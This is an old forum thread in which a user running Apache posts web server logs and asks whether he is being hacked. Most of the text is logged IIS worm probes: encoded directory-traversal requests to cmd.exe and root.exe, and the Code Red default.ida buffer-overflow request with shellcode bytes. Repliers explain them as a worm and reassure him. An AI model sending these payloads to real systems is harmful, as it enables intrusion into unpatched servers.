• We’re currently investigating an issue related to the forum theme and styling that is impacting page layout and visual formatting. The problem has been identified, and we are actively working on a resolution. There is no impact to user data or functionality, this is strictly a front-end display issue. We’ll post an update once the fix has been deployed. Thanks for your patience while we get this sorted.

Am I getting hacked?

T

Tanner

Diamond Member
200.54.171.210 - - [01/Mar/2003:01:10:38 -0500] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 330
68.37.126.213 - - [01/Mar/2003:11:54:21 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 284
68.37.126.213 - - [01/Mar/2003:11:54:21 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 282
68.37.126.213 - - [01/Mar/2003:11:54:21 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
68.37.126.213 - - [01/Mar/2003:11:54:21 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
68.37.126.213 - - [01/Mar/2003:11:54:21 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
68.37.126.213 - - [01/Mar/2003:11:54:22 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
68.37.126.213 - - [01/Mar/2003:11:54:22 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
68.37.126.213 - - [01/Mar/2003:11:54:22 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339
68.37.126.213 - - [01/Mar/2003:11:54:22 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
68.37.126.213 - - [01/Mar/2003:11:54:22 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
68.37.126.213 - - [01/Mar/2003:11:54:23 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
68.37.126.213 - - [01/Mar/2003:11:54:23 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
68.37.126.213 - - [01/Mar/2003:11:54:23 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 296
68.37.126.213 - - [01/Mar/2003:11:54:23 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 296
68.37.126.213 - - [01/Mar/2003:11:54:23 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
68.37.126.213 - - [01/Mar/2003:11:54:23 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
68.112.56.113 - - [01/Mar/2003:14:37:13 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 284
68.112.56.113 - - [01/Mar/2003:14:37:13 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 282
68.112.56.113 - - [01/Mar/2003:14:37:13 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
68.112.56.113 - - [01/Mar/2003:14:37:13 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
68.112.56.113 - - [01/Mar/2003:14:37:14 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
68.112.56.113 - - [01/Mar/2003:14:37:14 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
68.112.56.113 - - [01/Mar/2003:14:37:14 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
68.112.56.113 - - [01/Mar/2003:14:37:14 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339
68.112.56.113 - - [01/Mar/2003:14:37:15 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
68.112.56.113 - - [01/Mar/2003:14:37:15 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
68.112.56.113 - - [01/Mar/2003:14:37:15 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
68.112.56.113 - - [01/Mar/2003:14:37:15 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
68.112.56.113 - - [01/Mar/2003:14:37:16 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 296
68.112.56.113 - - [01/Mar/2003:14:37:16 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 296
68.112.56.113 - - [01/Mar/2003:14:37:16 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
68.112.56.113 - - [01/Mar/2003:14:37:16 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306

those entries are on there pretty much every single day... It seems to constantly be someone on COX...

anyhow... someone going for cmd.exe appears to be "trying" to hack me. I've got apache setup w/ the secure settings (I can't even get my 0wn st00pid page up on my machine) 😀 So, I don't think that they're getting anything really... but what is up w/ the ..%c1%1c../ parts? I don't understand?

 
Looks reminiscent of Code Red. It's trying to explot the buffer overflow and then run a command on your cmd.exe. Wonder what idiot still hasn't patched that bug (if that's it)
 
Here are the latest ones...I don't know what the long string of XXXXXXs are... what's THAT all about?

68.18.198.177 - - [18/Mar/2003:19:42:47 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 300

68.85.21.169 - - [18/Mar/2003:20:09:49 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 284
68.85.21.169 - - [18/Mar/2003:20:09:49 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 282
68.85.21.169 - - [18/Mar/2003:20:09:49 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
68.85.21.169 - - [18/Mar/2003:20:09:49 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
68.85.21.169 - - [18/Mar/2003:20:09:49 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
68.85.21.169 - - [18/Mar/2003:20:09:49 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323

68.85.21.169 - - [18/Mar/2003:20:09:50 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323

68.85.21.169 - - [18/Mar/2003:20:09:50 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339

68.85.21.169 - - [18/Mar/2003:20:09:50 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
68.85.21.169 - - [18/Mar/2003:20:09:50 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
68.85.21.169 - - [18/Mar/2003:20:09:51 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
68.85.21.169 - - [18/Mar/2003:20:09:51 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
68.85.21.169 - - [18/Mar/2003:20:09:51 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 296
68.85.21.169 - - [18/Mar/2003:20:09:51 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 296
68.85.21.169 - - [18/Mar/2003:20:09:51 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
68.85.21.169 - - [18/Mar/2003:20:09:51 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306

68.18.198.177 - - [18/Mar/2003:20:48:22 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 300

68.50.162.155 - - [18/Mar/2003:21:18:48 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 300

68.18.198.177 - - [18/Mar/2003:21:38:35 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 300

MAN those are long! WHAT the HECK would a server make of THAT stuff? 😕
 
let me say this again, more clearly, YOU NOT GETTING HACKED, READ SECURITY BBS AND ADVISORIES BEFORE BLINDLY POSTING!!! AND FOR GOD SAKES LISTEN WHEN PEOPLE TALK TO YOU!.
 
Originally posted by: narzy
let me say this again, more clearly, YOU NOT GETTING HACKED, READ SECURITY BBS AND ADVISORIES BEFORE BLINDLY POSTING!!! AND FOR GOD SAKES LISTEN WHEN PEOPLE TALK TO YOU!.
Click to expand...

Did he argue after you said that the first time? 😕
 
I'm pretty sure it's Code Red or a similar IIS worm. The long strings of X's are attempting to overflow the buffer and then execute code to compromise your system. If you're seeing that and you have run the latest antivirus software and are fully patched (or aren't running IIS) odds are you're just getting hit by it, not infected.

Block the port/IP that it is coming from on your router.
 
well,

I've got Norton AV runnin' w/ the latest update.
I'm runnin' Apache...who in their right mind would run IIS OUCH! 😀

😕
 
You must log in or register to reply here.

TRENDING THREADS

Back
Top